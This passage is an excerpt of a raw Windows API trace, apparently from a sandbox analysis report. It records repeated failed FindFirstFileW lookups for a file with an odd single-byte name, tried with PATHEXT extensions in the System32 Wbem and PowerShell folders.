ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.344] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f.CPL" (normalized: "c:\\windows\\system32\\wbem\\\x9f.cpl"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0280.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0280.345] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\\x9f" (normalized: "c:\\windows\\system32\\wbem\\\x9f"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.345] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.ps1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.346] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.psm1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.347] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.psd1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.347] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.COM" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.com"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.348] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.EXE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.exe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.349] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.BAT" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.bat"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.349] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.CMD" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.cmd"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.350] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.VBS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.vbs"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.350] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.350] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.VBE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.vbe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.350] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.351] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.JS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.js"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.351] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.JSE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.jse"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.352] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.WSF" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.wsf"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.352] FindFirstFileW (in: 